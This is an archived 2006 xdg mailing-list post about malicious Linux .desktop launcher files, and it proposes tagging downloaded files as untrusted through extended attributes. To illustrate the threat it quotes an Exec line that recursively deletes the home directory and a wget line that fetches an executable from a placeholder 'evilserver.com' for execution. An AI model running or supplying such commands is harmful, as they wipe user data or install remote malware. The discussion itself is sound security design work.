Security issue with .desktop files revisited
fgouget at codeweavers.com
Tue Mar 28 12:32:25 EEST 2006
Mike Hearn wrote:
> On Thu, 23 Mar 2006 17:55:26 +0100, Thiago Macieira wrote:
>>I don't see how it is any different from .desktop files with:
>>Exec=/bin/sh -c 'cd ; rm -rf *'
>>(don't run that!)
> It's not really, except you can write longer programs and even run
> arbitrary ELF programs too.
Not even. First KDE, at least, lets you specify multiple commands
separated by semi-colon so you could drop the 'sh -c':
But more importantly a small shell command is all you need to execute
Exec=sh -c 'wget -O /tmp/evil http://evilserver.com/evil;chmod u+x
Where 'evil' is any arbitrary executable. All that protects you is that
wget might possibly not be installed.
>>It looks like the best alternative.
>>But why should we require users to go the properties and turn it
>>executable? If you've got a legitimate .desktop file, it already follows
>>the guidelines, which may include being executable or not.
If think the solution would be to do like Windows XP SP2 does (or maybe
it is Windows 2003). When you download a file (at least using IE and
depending on your 'zone' settings), it sets some 'extended file
attributes' to tag the file as untrusted. Then when you try to execute
that file, ShellExecute() (maybe CreateProcess() too) warns you that the
file may represent a security risk. If you decide to continue, then it
clears the extended file attribute so you don't get the warning again
and again. That attribute is also copied when you copy or rename the
file (at least I think so, if using the standard OS tools).
What this would mean for Linux:
* ext3 and other filesystems have support for extended attributes so
the basic support is there (though I'm not sure how windely used/stable
extended attributes support is).
* a standard would need to be defined so all involved applications use
the same extended attribute for this purpose
* applications that download stuff from the internet would need to set
that extended attribute. This means Konqueror, Firefox & co,
Thunderbird, Evolution, but, ideally, also wget, etc.
* file managers and desktop shells should warn the user when he tries
to run a file with this 'untrusted' extended attribute.
So in the above scenario, when the user downloads the rogue '.desktop'
file to his desktop, that file will be tagged as 'untrusted'. Then,
clicking on it would warn the user before running it. .desktop files
shipped with the distribution would not have the 'untrusted' bit and
thus would not issue this warning. Also, this warning could be
selectively issued only for .desktop and 'executable' files, and not if
the file is merely a simple jpeg. But that could be configurable and a
'paranoid' setting would warn for all untrusted files (in case they are
designed to trigger buffer overflows).
Such a solution requires quite a bit of work and time to be implemented
but then I think any solution to this problem do.
fgouget at codeweavers.com
More information about the xdg